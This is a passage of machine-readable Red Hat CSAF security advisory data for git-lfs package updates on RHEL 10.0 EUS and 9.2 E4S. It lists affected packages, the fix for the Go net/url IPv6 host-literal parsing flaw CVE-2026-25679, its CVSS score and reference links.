"git-lfs-debugsource-0:3.6.1-2.el10_0.3.x86_64", "product_id": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@3.6.1-2.el10_0.3?arch=x86_64"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.x86_64", "product": {"name": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.x86_64", "product_id": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@3.6.1-2.el10_0.3?arch=x86_64"}}}], "category": "architecture", "name": "x86_64"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.6.1-2.el10_0.3.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.aarch64"}, "product_reference": "git-lfs-0:3.6.1-2.el10_0.3.aarch64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.6.1-2.el10_0.3.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.ppc64le"}, "product_reference": "git-lfs-0:3.6.1-2.el10_0.3.ppc64le", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.6.1-2.el10_0.3.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.s390x"}, "product_reference": "git-lfs-0:3.6.1-2.el10_0.3.s390x", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.6.1-2.el10_0.3.src as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.src"}, "product_reference": "git-lfs-0:3.6.1-2.el10_0.3.src", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.6.1-2.el10_0.3.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.x86_64"}, "product_reference": "git-lfs-0:3.6.1-2.el10_0.3.x86_64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.aarch64"}, "product_reference": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.aarch64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.ppc64le"}, "product_reference": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.ppc64le", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.s390x"}, "product_reference": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.s390x", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.x86_64"}, "product_reference": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.x86_64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.aarch64"}, "product_reference": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.aarch64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.ppc64le"}, "product_reference": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.ppc64le", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.s390x"}, "product_reference": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.s390x", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.x86_64"}, "product_reference": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.x86_64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.aarch64", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.ppc64le", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.s390x", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.src", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.x86_64", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.aarch64", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.ppc64le", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.s390x", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.x86_64", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.aarch64", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.ppc64le", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.s390x", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-21T17:12:00+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.aarch64", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.ppc64le", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.s390x", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.src", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.x86_64", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.aarch64", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.ppc64le", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.s390x", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.x86_64", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.aarch64", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.ppc64le", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.s390x", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9435"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.aarch64", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.ppc64le", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.s390x", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.src", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.x86_64", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.aarch64", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.ppc64le", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.s390x", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.x86_64", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.aarch64", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.ppc64le", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.s390x", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.aarch64", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.ppc64le", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.s390x", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.src", "AppStream-10.0.Z.E2S:git-lfs-0:3.6.1-2.el10_0.3.x86_64", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.aarch64", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.ppc64le", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.s390x", "AppStream-10.0.Z.E2S:git-lfs-debuginfo-0:3.6.1-2.el10_0.3.x86_64", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.aarch64", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.ppc64le", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.s390x", "AppStream-10.0.Z.E2S:git-lfs-debugsource-0:3.6.1-2.el10_0.3.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:9435"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for git-lfs is now available for Red Hat Enterprise Linux 9.2 Update Services for SAP Solutions.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server.\n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:9434", "url": "https://access.redhat.com/errata/RHSA-2026:9434"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_9434.json"}], "title": "Red Hat Security Advisory: git-lfs security update", "tracking": {"current_release_date": "2026-06-08T15:52:50+00:00", "generator": {"date": "2026-06-08T15:52:50+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:9434", "initial_release_date": "2026-04-21T17:19:55+00:00", "revision_history": [{"date": "2026-04-21T17:19:55+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-21T17:19:55+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:50+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product": {"name": "Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_e4s:9.2::appstream"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.2.0-2.el9_2.6.src", "product": {"name": "git-lfs-0:3.2.0-2.el9_2.6.src", "product_id": "git-lfs-0:3.2.0-2.el9_2.6.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.2.0-2.el9_2.6?arch=src"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.2.0-2.el9_2.6.aarch64", "product": {"name": "git-lfs-0:3.2.0-2.el9_2.6.aarch64", "product_id": "git-lfs-0:3.2.0-2.el9_2.6.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.2.0-2.el9_2.6?arch=aarch64"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.aarch64", "product": {"name": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.aarch64", "product_id": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@3.2.0-2.el9_2.6?arch=aarch64"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.aarch64", "product": {"name": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.aarch64", "product_id": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@3.2.0-2.el9_2.6?arch=aarch64"}}}], "category": "architecture", "name": "aarch64"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.2.0-2.el9_2.6.ppc64le", "product": {"name": "git-lfs-0:3.2.0-2.el9_2.6.ppc64le", "product_id": "git-lfs-0:3.2.0-2.el9_2.6.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.2.0-2.el9_2.6?arch=ppc64le"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.ppc64le", "product": {"name": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.ppc64le", "product_id": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@3.2.0-2.el9_2.6?arch=ppc64le"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.ppc64le", "product": {"name": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.ppc64le", "product_id": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@3.2.0-2.el9_2.6?arch=ppc64le"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.2.0-2.el9_2.6.x86_64", "product": {"name": "git-lfs-0:3.2.0-2.el9_2.6.x86_64", "product_id": "git-lfs-0:3.2.0-2.el9_2.6.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.2.0-2.el9_2.6?arch=x86_64"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.x86_64", "product": {"name": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.x86_64", "product_id": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@3.2.0-2.el9_2.6?arch=x86_64"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.x86_64", "product": {"name": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.x86_64", "product_id": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@3.2.0-2.el9_2.6?arch=x86_64"}}}], "category": "architecture", "name": "x86_64"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.2.0-2.el9_2.6.s390x", "product": {"name": "git-lfs-0:3.2.0-2.el9_2.6.s390x", "product_id": "git-lfs-0:3.2.0-2.el9_2.6.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.2.0-2.el9_2.6?arch=s390x"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.s390x", "product": {"name": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.s390x", "product_id": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@3.2.0-2.el9_2.6?arch=s390x"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.s390x", "product": {"name": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.s390x", "product_id": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@3.2.0-2.el9_2.6?arch=s390x"}}}], "category": "architecture", "name": "s390x"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.2.0-2.el9_2.6.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.aarch64"}, "product_reference": "git-lfs-0:3.2.0-2.el9_2.6.aarch64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.2.0-2.el9_2.6.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.ppc64le"}, "product_reference": "git-lfs-0:3.2.0-2.el9_2.6.ppc64le", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.2.0-2.el9_2.6.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.s390x"}, "product_reference": "git-lfs-0:3.2.0-2.el9_2.6.s390x", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.2.0-2.el9_2.6.src as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.src"}, "product_reference": "git-lfs-0:3.2.0-2.el9_2.6.src", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.2.0-2.el9_2.6.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.x86_64"}, "product_reference": "git-lfs-0:3.2.0-2.el9_2.6.x86_64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.aarch64"}, "product_reference": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.aarch64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.ppc64le"}, "product_reference": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.ppc64le", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.s390x"}, "product_reference": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.s390x", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.x86_64"}, "product_reference": "git-lfs-debuginfo-0:3.2.0-2.el9_2.6.x86_64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.aarch64"}, "product_reference": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.aarch64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.ppc64le"}, "product_reference": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.ppc64le", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.s390x"}, "product_reference": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.s390x", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.x86_64"}, "product_reference": "git-lfs-debugsource-0:3.2.0-2.el9_2.6.x86_64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.aarch64", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.ppc64le", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.s390x", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.src", "AppStream-9.2.0.Z.E4S:git-lfs-0:3.2.0-2.el9_2.6.x86_64", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.aarch64", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.ppc64le", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.s390x", "AppStream-9.2.0.Z.E4S:git-lfs-debuginfo-0:3.2.0-2.el9_2.6.x86_64", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.aarch64", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.ppc64le", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.s390x", "AppStream-9.2.0.Z.E4S:git-lfs-debugsource-0:3.2.0-2.el9_2.6.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": 